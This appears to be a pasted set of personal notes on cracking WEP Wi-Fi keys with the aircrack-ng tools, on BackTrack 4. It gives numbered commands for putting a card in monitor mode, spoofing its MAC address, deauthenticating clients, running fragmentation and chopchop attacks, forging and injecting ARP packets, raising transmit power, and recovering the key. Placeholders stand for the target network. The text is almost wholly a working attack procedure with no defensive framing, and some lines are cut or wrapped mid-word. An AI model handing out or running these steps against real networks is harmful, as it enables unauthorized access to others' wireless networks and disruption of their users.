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airmon-ng start wlan0

airodump-ng -c "channel" --bssid "AP MAC" -w output wlan0

aireplay-ng -3 -b "AP MAC" wlan0
aireplay-ng -1 0 -e "AP NAME" -a "AP MAC" wlan0
aireplay-ng -0 10 -a "AP MAC" -c "CL MAC" wlan0
aircrack-ng -s -b "AP MAC" output*.cap
EDIT: First enable high power on your awus036h to make it inject over even great
er distances: (using r8187 driver)
modprobe -r rtl8187
modprobe r8187
iwpriv wlan0 highpower 1
iwconfig wlan0 txpower 27
Now bring it up in monitor mode and follow the steps below.
1 - Start airodump on the correct channel/bssid:
airodump-ng -c CHANNELAP --bssid BSSIDAP -w dlink wlan0
2 - Try the fragmentation attack first, and if succesfull; it will always give y
ou a 1500 bytes XOR file: ( you might have to try a few different packets before
it will work )
aireplay-ng -5 -b BSSIDAP -r dlink-01.cap wlan0
3 - If fragmentation doesn't work, try chopchop instead, but keep this in mind:
If you use a XOR file obtained from a chopchop attack, be sure it is at least 14
4 bytes long! Which means you should select a packet from the AP to chopchop tha
t's at least 144 bytes, so it will result in a 144 bytes XOR file: (keystream)
aireplay-ng -4 -b BSSIDAP -r dlink-01.cap wlan0
4 - Once you get a valid XOR file, from either chopchop or fragmentation, and it
's equal or bigger than 144 bytes, you can use it for fake Shared Key Authentica
aireplay-ng -1 0 -a BSSIDAP -y NAMEOFXORFILE.xor wlan0
5 - If authentication is succesfull, it's time to forge an ARP packet:
packetforge-ng -0 -a BSSIDAP -h YOURCARDSMAC -k -l
55 -y NAMEOFXORFILE.xor -w arp
6 - Inject your forged ARP packet:
aireplay-ng -3 -b BSSIDAP -r arp wlan0
7 - IV/data rate goes up in airodump, so you can now crack the key with aircrack
aircrack-ng dlink*.cap
These are all different colors because they coordinate with parts of the code yo
u will have to change when typing them.
wlan0 = Interface (Examples: wlan0, ath0, eth0)
ch = The channel the target is on (Examples: 6, 11)
bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
ssid = Name of target (Examples: linksys, default)
filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)
fragment-*.xor= The * being replaced by a number
(Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)
Ignore :
1. Boot computer with Backtrack 4 (login: root , pass: toor / poweroff at end)
2. Open Konsole and type the following:
3. airmon-ng (You will find your Interface here)
4. airmon-ng stop wlan0 **My interface is wlan0. It may be yours also. Replace a
ll the wlan0 with your own interface!**
5. ifconfig wlan0 down
6. macchanger --mac 00:11:22:33:44:55 wlan0
7. airmon-ng start wlan0
8. airodump-ng wlan0
9. Hit CTRL+C after finding WEP wanting to crack, then COPY THE BSSID
10. airodump-ng -c (ch) -w (file name) --bssid (bssid) wlan0
11. Open new Konsole and type the following:
12. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
13. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
14. Open new Konsole and type the following:
15. aircrack-ng -b (bssid) (file name)-01.cap
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k -l 255.2
55.255.255 -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK
**Be sure to open new Konsoles when necessary**

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